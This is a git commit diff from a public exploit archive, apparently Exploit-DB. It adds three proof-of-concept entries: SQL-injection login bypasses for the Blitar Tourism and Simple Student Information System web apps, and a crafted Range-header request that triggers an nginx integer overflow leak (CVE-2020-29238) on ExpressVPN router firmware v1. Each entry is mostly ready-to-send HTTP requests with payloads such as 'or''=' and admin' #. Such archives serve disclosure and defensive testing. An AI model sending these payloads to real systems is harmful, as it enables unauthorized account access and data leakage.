DB: 2021-04-14
3 changes to exploits/shellcodes Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) Blitar Tourism 1.0 - Authentication Bypass SQLi ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
This commit is contained in:
parent
372d2afce7
commit
884f246971
4 changed files with 100 additions and 0 deletions
23
exploits/multiple/webapps/49759.txt
Normal file
23
exploits/multiple/webapps/49759.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi
|
||||
# Date: 13 April 2021
|
||||
# Exploit Author: sigeri94
|
||||
# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/
|
||||
# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
|
||||
# Version: 1.0
|
||||
|
||||
POST /travel/Admin/ HTTP/1.1
|
||||
Host: 192.168.186.132
|
||||
Content-Length: 49
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://192.168.186.132
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://192.168.186.132/travel/Admin/
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
|
||||
Connection: close
|
||||
|
||||
username=admin%27+%23&password=admin&Login=Log+in
|
41
exploits/multiple/webapps/49760.txt
Normal file
41
exploits/multiple/webapps/49760.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
|
||||
# Date: 09-04-2021
|
||||
# Exploit Author: Jai Kumar Sharma
|
||||
# Vendor Homepage: https://www.expressvpn.com/
|
||||
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
|
||||
# Version: version 1
|
||||
# Tested on: Windows/Ubuntu/MacOS
|
||||
# CVE : CVE-2020-29238
|
||||
|
||||
*Proof of concept*:
|
||||
|
||||
ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server
|
||||
|
||||
ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/
|
||||
|
||||
ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
|
||||
|
||||
Crafted Request:
|
||||
GET / HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
|
||||
Gecko/20100101 Firefox/81.0
|
||||
Host: 127.0.0.1:8181
|
||||
Accept-Encoding: identity
|
||||
Range: bytes=-17208,-9223372036854758999
|
||||
Connection: close
|
||||
|
||||
|
||||
Response:
|
||||
HTTP/1.1 206 Partial Content
|
||||
Server: nginx/1.9.15
|
||||
Date: Tue, 10 Nov 2020 19:22:05 GMT
|
||||
Content-Type: multipart/byteranges; boundary=00000000002
|
||||
Content-Length: 598
|
||||
Last-Modified: Thu, 13 Sep 2018 04:55:28 GMT
|
||||
Connection: close
|
||||
ETag: "5b99edc0-99f"
|
||||
|
||||
|
||||
--00000000002
|
||||
Content-Type: text/html
|
||||
Content-Range: bytes -14745-2462/2463
|
33
exploits/php/webapps/49758.txt
Normal file
33
exploits/php/webapps/49758.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)
|
||||
# Date: 13 April 2021
|
||||
# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=11400&title=Simple+Student+Information+System+using+PHP+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested on: windows 10
|
||||
|
||||
POC
|
||||
|
||||
Step 1 - Go to url http://localhost/studentinfosystem/index.php
|
||||
Step 2 – Enter anything in username and password
|
||||
Step 3 – Click on Login and capture the request in burpsuite
|
||||
Step 4 – Change the username to 'or''=' and password 'or''='
|
||||
Step 5 – after entering the payload, you can enter the website
|
||||
|
||||
|
||||
POST /studentinfosystem/index.php HTTP/1.1
|
||||
Host: 192.168.1.14
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
|
||||
Gecko/20100101 Firefox/87.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 46
|
||||
Origin: http://192.168.1.14
|
||||
Connection: close
|
||||
Referer: http://192.168.1.14/studentinfosystem/index.php
|
||||
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
username='or''='&password='or''='&login=Log+In
|
|
@ -43934,3 +43934,6 @@ id,file,description,date,author,type,platform,port
|
|||
49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,
|
||||
49753,exploits/php/webapps/49753.txt,"Composr 10.0.36 - Remote Code Execution",2021-04-08,"Orion Hridoy",webapps,php,
|
||||
49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,
|
||||
49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,
|
||||
49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,
|
||||
49760,exploits/multiple/webapps/49760.txt,"ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow",2021-04-13,"Jai Kumar Sharma",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue